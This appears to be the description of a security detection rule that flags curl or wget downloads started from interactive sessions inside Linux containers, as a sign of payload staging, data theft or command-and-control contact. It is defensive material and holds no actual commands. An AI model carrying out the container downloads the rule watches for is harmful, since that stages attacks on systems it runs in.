This rule detects the download of files from within a container using command-line tools such as 'curl' or 'wget', indicating possible malicious activity where adversaries may be attempting to extract sensitive data or communicate with command-and-control (C2) servers. The focus is on Linux containers and the rule identifies instances where interactive sessions are initiated that execute these commands to pull content from external URLs or IPs. The downloaded files could be malicious tools, payloads, or data, as attackers frequently employ on-demand downloads to set up further actions without embedding malicious artifacts within images. To effectively respond to alerts generated by this rule, analysts should investigate the context of the download to determine if it is linked to legitimate operations or is indicative of a security breach.